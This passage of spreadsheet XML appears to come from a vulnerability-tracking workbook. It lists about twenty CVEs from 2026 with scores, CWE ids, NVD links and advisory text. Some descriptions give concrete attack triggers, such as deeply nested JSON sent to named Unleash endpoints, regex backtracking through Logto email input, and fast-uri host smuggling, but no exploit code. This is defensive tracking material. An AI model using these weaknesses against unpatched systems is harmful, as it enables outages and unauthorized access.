      <c r="B2686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62317</t>
        </is>
      </c>
      <c r="C2686" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2686" s="5" t="inlineStr"/>
      <c r="F2686" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2686" s="5" t="inlineStr"/>
      <c r="H2686" s="5" t="inlineStr"/>
      <c r="I2686" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2686" s="5" t="inlineStr"/>
      <c r="K2686" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L2686" s="5" t="inlineStr">
        <is>
          <t>Logto is the modern, open-source auth infrastructure for SaaS and AI apps. Prior to 1.41.0, Logto's email subaddressing blocklist in packages/core/src/libraries/sign-in-experience/email-blocklist-policy.ts used the attacker-controlled domain from email input to construct subaddressingRegex when blockSubaddressing was enabled. The permissive emailRegEx accepted multiple at signs and regular expression metacharacters, and POST /api/experience/verification/verification-code could therefore cause catastrophic backtracking in subaddressingRegex.test(email). The resulting event-loop stall could make authentication, token issuance, SSO, and the administrative console unavailable. This issue is fixed in version 1.41.0.</t>
        </is>
      </c>
      <c r="M2686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62317</t>
        </is>
      </c>
    </row>
    <row r="2687">
      <c r="A2687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62759</t>
        </is>
      </c>
      <c r="C2687" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2687" s="5" t="inlineStr"/>
      <c r="F2687" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2687" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2687" s="5" t="inlineStr"/>
      <c r="I2687" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2687" s="5" t="inlineStr"/>
      <c r="K2687" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L2687" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="M2687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t>
        </is>
      </c>
    </row>
    <row r="2688">
      <c r="A2688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62813</t>
        </is>
      </c>
      <c r="C2688" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2688" s="5" t="inlineStr"/>
      <c r="F2688" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2688" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2688" s="5" t="inlineStr"/>
      <c r="I2688" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2688" s="5" t="inlineStr"/>
      <c r="K2688" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2688" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t>
        </is>
      </c>
    </row>
    <row r="2689">
      <c r="A2689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6285</t>
        </is>
      </c>
      <c r="C2689" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2689" s="5" t="inlineStr"/>
      <c r="F2689" s="5" t="inlineStr"/>
      <c r="G2689" s="5" t="inlineStr"/>
      <c r="H2689" s="5" t="inlineStr"/>
      <c r="I2689" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2689" s="5" t="inlineStr"/>
      <c r="K2689" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="L2689" s="5" t="inlineStr">
        <is>
          <t>Weak Password Recovery Mechanism for Forgotten Password vulnerability in Ankaref Innovation and Technology Inc. LIBRID/LIBREF allows Password Recovery Exploitation.
This issue affects LIBRID/LIBREF: from 2.01.0.2183 through 10092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M2689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6285</t>
        </is>
      </c>
    </row>
    <row r="2690">
      <c r="A2690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62999</t>
        </is>
      </c>
      <c r="C2690" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2690" s="5" t="inlineStr"/>
      <c r="F2690" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2690" s="5" t="inlineStr"/>
      <c r="H2690" s="5" t="inlineStr"/>
      <c r="I2690" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2690" s="5" t="inlineStr"/>
      <c r="K2690" s="5" t="inlineStr">
        <is>
          <t>CWE-180, CWE-22</t>
        </is>
      </c>
      <c r="L2690" s="5" t="inlineStr">
        <is>
          <t>Copier is a library and CLI app for rendering project templates. From 9.5.0 through 9.16.0, percent-encoded parent-directory segments or encoded path separators in a template URL can match a configured trusted repository prefix before an HTTP server or Git transport decodes the path, allowing unsafe template features from a repository outside the trusted prefix to run after user interaction. This issue is fixed in version 9.17.0.</t>
        </is>
      </c>
      <c r="M2690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62999</t>
        </is>
      </c>
    </row>
    <row r="2691">
      <c r="A2691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6321</t>
        </is>
      </c>
      <c r="C2691" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2691" s="5" t="inlineStr"/>
      <c r="F2691" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2691" s="5" t="inlineStr"/>
      <c r="H2691" s="5" t="inlineStr">
        <is>
          <t>openjsf:fast-uri</t>
        </is>
      </c>
      <c r="I2691" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J2691" s="5" t="inlineStr"/>
      <c r="K2691" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2691" s="5" t="inlineStr">
        <is>
          <t>fast-uri decoded percent-encoded path separators and dot segments before applying dot-segment removal in its normalize() and equal() functions. Encoded path data was treated like real slashes and parent-directory references, so distinct URIs could collapse onto the same normalized path. Applications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed, with a path that appears confined under an allowed prefix normalizing to a different location. Versions &lt;= 3.1.0 are affected. Update to 3.1.1 or later.</t>
        </is>
      </c>
      <c r="M2691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6321</t>
        </is>
      </c>
    </row>
    <row r="2692">
      <c r="A2692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6322</t>
        </is>
      </c>
      <c r="C2692" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2692" s="5" t="inlineStr"/>
      <c r="F2692" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2692" s="5" t="inlineStr"/>
      <c r="H2692" s="5" t="inlineStr">
        <is>
          <t>openjsf:fast-uri</t>
        </is>
      </c>
      <c r="I2692" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J2692" s="5" t="inlineStr"/>
      <c r="K2692" s="5" t="inlineStr">
        <is>
          <t>CWE-140, CWE-436</t>
        </is>
      </c>
      <c r="L2692" s="5" t="inlineStr">
        <is>
          <t>fast-uri normalize() decoded percent-encoded authority delimiters inside the host component and then re-emitted them as raw delimiters during serialization. A host that combined an allowed domain, an encoded at-sign, and a different domain was re-emitted with the at-sign as a raw userinfo separator, changing the URI's authority to the second domain. Applications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the input appeared to specify. Versions &lt;= 3.1.1 are affected. Update to 3.1.2 or later.</t>
        </is>
      </c>
      <c r="M2692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6322</t>
        </is>
      </c>
    </row>
    <row r="2693">
      <c r="A2693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63222</t>
        </is>
      </c>
      <c r="C2693" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2693" s="5" t="inlineStr"/>
      <c r="F2693" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2693" s="5" t="inlineStr"/>
      <c r="H2693" s="5" t="inlineStr"/>
      <c r="I2693" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2693" s="5" t="inlineStr"/>
      <c r="K2693" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2693" s="5" t="inlineStr">
        <is>
          <t>CodeIgniter is a PHP full-stack web framework. Prior to 4.7.4, calling UploadedFile::move() without a second argument uses the client-provided filename without sanitization, allowing a remote attacker to use path traversal sequences to write uploaded content outside the intended directory when the application exposes an upload path. This issue is fixed in version 4.7.4.</t>
        </is>
      </c>
      <c r="M2693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63222</t>
        </is>
      </c>
    </row>
    <row r="2694">
      <c r="A2694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63408</t>
        </is>
      </c>
      <c r="C2694" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2694" s="5" t="inlineStr"/>
      <c r="F2694" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2694" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2694" s="5" t="inlineStr"/>
      <c r="I2694" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2694" s="5" t="inlineStr"/>
      <c r="K2694" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="L2694" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content.  Prior to 1.0.0-rc.16, the Grav API plugin JwtAuthenticator::extractBearerToken() accepts a JWT from the token URL query parameter on every /api/v1 route, including state-changing endpoints. Request URLs consequently expose valid access tokens through Apache, proxy, and CDN logs, browser history, and Referer headers, allowing a party with access to those records to reuse the token with the owner's API privileges. This issue is fixed in version 1.0.0-rc.16.</t>
        </is>
      </c>
      <c r="M2694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63408</t>
        </is>
      </c>
    </row>
    <row r="2695">
      <c r="A2695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63421</t>
        </is>
      </c>
      <c r="C2695" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2695" s="5" t="inlineStr"/>
      <c r="F2695" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2695" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2695" s="5" t="inlineStr"/>
      <c r="I2695" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2695" s="5" t="inlineStr"/>
      <c r="K2695" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-480</t>
        </is>
      </c>
      <c r="L2695" s="5" t="inlineStr">
        <is>
          <t>Keystone is a content management system for Node.js. Prior to 6.5.3, the findMany resolver in packages/core/src/lib/core/queries/resolvers.ts compares the signed take argument directly with graphql.maxTake, allowing a remote unauthenticated GraphQL client to provide a negative take value whose magnitude exceeds the configured bound. The bypass also applies to relationship queries and can return more records than the developer intended, potentially exhausting service resources. This issue is fixed in version 6.5.3.</t>
        </is>
      </c>
      <c r="M2695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63421</t>
        </is>
      </c>
    </row>
    <row r="2696">
      <c r="A2696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63462</t>
        </is>
      </c>
      <c r="C2696" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2696" s="5" t="inlineStr"/>
      <c r="F2696" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2696" s="5" t="inlineStr"/>
      <c r="H2696" s="5" t="inlineStr"/>
      <c r="I2696" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2696" s="5" t="inlineStr"/>
      <c r="K2696" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L2696" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 7.5.2, 7.6.5, and 8.0.2, the shared OpenAPI validation error path in src/lib/error/bad-data-error.ts passes a raw request value from lodash.get to JSON.stringify in genericErrorMessage and fromOpenApiValidationErrors without guarding stack exhaustion. An unauthenticated attacker can send a roughly 10 KB JSON value nested thousands of levels deep to POST /edge/validate, POST /edge/issue-token, or another OpenAPI-validated endpoint, causing RangeError: Maximum call stack size exceeded in openAPIValidationMiddleware and terminating the Node process because no uncaughtException handler recovers it. Replaying the request can sustain a complete service outage. This issue is fixed in versions 7.5.2, 7.6.5, and 8.0.2.</t>
        </is>
      </c>
      <c r="M2696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63462</t>
        </is>
      </c>
    </row>
    <row r="2697">
      <c r="A2697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63495</t>
        </is>
      </c>
      <c r="C2697" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2697" s="5" t="inlineStr"/>
      <c r="F2697" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2697" s="5" t="inlineStr"/>
      <c r="H2697" s="5" t="inlineStr"/>
      <c r="I2697" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2697" s="5" t="inlineStr"/>
      <c r="K2697" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2697" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. From 2.2.0-alpha-dev until 2.2.2-alpha, the libevent WebSocket server in ws.c accumulates fragmented frames in evws-&gt;incomplete_frames without enforcing a total message-size limit. An unauthenticated remote client can repeatedly send fragmented WebSocket frames below WS_MAX_RECV_FRAME_SZ with FIN=0, causing the evbuffer to grow without bound until the process or host exhausts memory. This issue is fixed in version 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M2697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63495</t>
        </is>
      </c>
    </row>
    <row r="2698">
      <c r="A2698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6377</t>
        </is>
      </c>
      <c r="C2698" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2698" s="5" t="inlineStr"/>
      <c r="F2698" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2698" s="5" t="inlineStr"/>
      <c r="H2698" s="5" t="inlineStr"/>
      <c r="I2698" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2698" s="5" t="inlineStr"/>
      <c r="K2698" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2698" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Next4Biz Information Technologies Inc. CSM (Customer Service Management) allows Path Traversal.
This issue affects CSM (Customer Service Management): from 6.8.9 before 8.0.3.</t>
        </is>
      </c>
      <c r="M2698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6377</t>
        </is>
      </c>
    </row>
    <row r="2699">
      <c r="A2699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64374</t>
        </is>
      </c>
      <c r="C2699" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2699" s="5" t="inlineStr"/>
      <c r="F2699" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2699" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2699" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2699" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2699" s="5" t="inlineStr"/>
      <c r="K2699" s="5" t="inlineStr">
        <is>
          <t>CWE-667</t>
        </is>
      </c>
      <c r="L2699" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/rt: Have RT_PUSH_IPI be default off for non PREEMPT_RT
RT migration is done aggressively. When a CPU schedules out a high
priority RT task for a lower priority task, it will look to see if there's
any RT tasks that are waiting to run on another CPU that is of higher
priority than the task this CPU is about to run. If it finds one, it will
pull that task over to the CPU and allow it to run there instead.
Normally, this pulling is done by looking at the RT overloaded mask (rto)
which contains all the CPUs in the scheduler domain with RT tasks that are
waiting to run due to a higher priority RT task currently running on their
CPU. The CPU that is about to schedule a lower priority task will grab the
rq lock of the overloaded CPU and move the RT task from that CPU's runqueue
to the local one and schedule the higher priority RT task.
This caused issues when a lot of CPUs would schedule a lower priority task
at the same time. They would all try to grab the same runqueue lock of
the CPU with the overloaded RT tasks. Only the first CPU that got in will
get that task. All the others would wait until they got the runqueue lock
and see there's nothing to pull and do nothing. On systems with lots of
CPUs, this caused a large latency (up to 500us) which is beyond what
PREEMPT_RT is to allow.
The solution to that was to create an RT_PUSH_IPI logic. When any CPU
wanted to pull a task, instead of grabbing the runqueue lock of the
overloaded CPU, it would start by sending an IPI to the overloaded CPU,
and that IPI handler would have the CPU with the waiting RT task do a push
instead. Then that handler would send an IPI to the next CPU with
overloaded RT tasks, and so on. Note, after the first CPU starts this
process, if another CPU wanted to do a pull, it would see that the process
has already begun and would only increment a counter to have the IPIs
continue again.
The RT_PUSH_IPI solved the latency problem with PREEMPT_RT but could cause
a new issue with non PREEMPT_RT. Namely, softirqs run in a threaded
context on PREEMPT_RT but they can run in an interrupt context in non-RT.
If an IPI lands on a CPU that has just woken up multiple RT tasks and the
current CPU is running a non RT or a low priority RT task, instead of
doing a push, it would simply do a schedule on that CPU. But if a softirq
was also executing on this CPU, the schedule would need to wait until the
softirq finished. Until then, the CPU would still be considered overloaded
as there are RT tasks still waiting to run on it.
A live lock occurred on a workload that was doing heavy networking traffic
on a large machine where the softirqs would run 500us out of 750us. And it
would also be waking up RT tasks, causing the RT pull logic to be
constantly executed.
When a softirq triggered on a CPU with RT tasks queued but not running
yet, and the other CPUs would see this CPU as being overloaded, they would
send an IPI over to it. The CPU would notice that the waiting RT tasks are
of higher priority than the currently running task and simply schedule
that CPU instead. But because the softirq was executing, before it could
schedule, it would receive another IPI to do the same. The amount of IPIs
would slow down the currently running softirq so much that before it could
return back to task context, it would execute another softirq never
allowing the CPU to schedule. This live locked that CPU.
As RT_PUSH_IPI was created to help PREEMPT_RT, make it default off if
PREEMPT_RT is not enabled.</t>
        </is>
      </c>
      <c r="M2699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64374</t>
        </is>
      </c>
    </row>
    <row r="2700">
      <c r="A2700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65819</t>
        </is>
      </c>
      <c r="C2700" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2700" s="5" t="inlineStr"/>
      <c r="F2700" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2700" s="5" t="inlineStr"/>
      <c r="H2700" s="5" t="inlineStr"/>
      <c r="I2700" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2700" s="5" t="inlineStr"/>
      <c r="K2700" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-400</t>
        </is>
      </c>
      <c r="L2700" s="5" t="inlineStr">
        <is>
          <t>gopacket provides packet processing capabilities for Go. Through version 1.7.0, multiple layer decoders use attacker-controlled lengths, counts, or offsets before validating them against packet buffers, allowing a crafted packet decoded through DecodingLayerParser or DecodeFromBytes to trigger an unrecovered panic and remotely deny service.  A patch commit is available at 210f25f.</t>
        </is>
      </c>
      <c r="M2700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65819</t>
        </is>
      </c>
    </row>
    <row r="2701">
      <c r="A2701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65984</t>
        </is>
      </c>
      <c r="C2701" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2701" s="5" t="inlineStr"/>
      <c r="F2701" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2701" s="5" t="inlineStr"/>
      <c r="H2701" s="5" t="inlineStr"/>
      <c r="I2701" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2701" s="5" t="inlineStr"/>
      <c r="K2701" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L2701" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. In 1.3.2 and earlier, POST /api/refresh in server/api/auth/index.js falls back from current user data to decoded.groups, including when the user is deleted or groups is zero, and POST /api/heartbeat in server/api/index.js re-signs inbound JWT claims without validating the current database record. An attacker who possesses a previously issued privileged refresh cookie or access token can continue minting privileged JWTs after account deletion, disablement, role removal, or demotion. Continued refresh-cookie rotation can extend the stale session and preserve unauthorized access to user management, project manipulation, runtime configuration, scripts, and backdoor-account creation. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M2701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65984</t>
        </is>
      </c>
    </row>
    <row r="2702">
      <c r="A2702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66304</t>
        </is>
      </c>
      <c r="C2702" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2702" s="5" t="inlineStr"/>
      <c r="F2702" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2702" s="5" t="inlineStr"/>
      <c r="H2702" s="5" t="inlineStr"/>
      <c r="I2702" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2702" s="5" t="inlineStr"/>
      <c r="K2702" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2702" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t>
        </is>
      </c>
    </row>
    <row r="2703">
      <c r="A2703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66307</t>
        </is>
      </c>
      <c r="C2703" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2703" s="5" t="inlineStr"/>
      <c r="F2703" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2703" s="5" t="inlineStr"/>
      <c r="H2703" s="5" t="inlineStr"/>
      <c r="I2703" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2703" s="5" t="inlineStr"/>
      <c r="K2703" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2703" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t>
        </is>
      </c>
    </row>
    <row r="2704">
      <c r="A2704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66373</t>
        </is>
      </c>
      <c r="C2704" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2704" s="5" t="inlineStr"/>
      <c r="F2704" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2704" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2704" s="5" t="inlineStr"/>
      <c r="I2704" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2704" s="5" t="inlineStr"/>
      <c r="K2704" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2704" s="5" t="inlineStr">
        <is>
          <t>Redis before 8.8.0, in the unusual case where an authenticated attacker can execute RESTORE, allows remote code execution via a RESTORE payload where the same NACK (pending entry) is referenced by more than one consumer, because deleting both consumers via XGROUP DELCONSUMER leads to a double free. NOTE: this issue exists because of an incomplete fix for CVE-2026-25243.</t>
        </is>
      </c>
      <c r="M2704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66373</t>
        </is>
      </c>
    </row>
    <row r="2705">
      <c r="A2705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="C2705" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2705" s="5" t="inlineStr"/>
      <c r="F2705" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2705" s="5" t="inlineStr"/>
      <c r="H2705" s="5" t="inlineStr"/>
      <c r="I2705" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
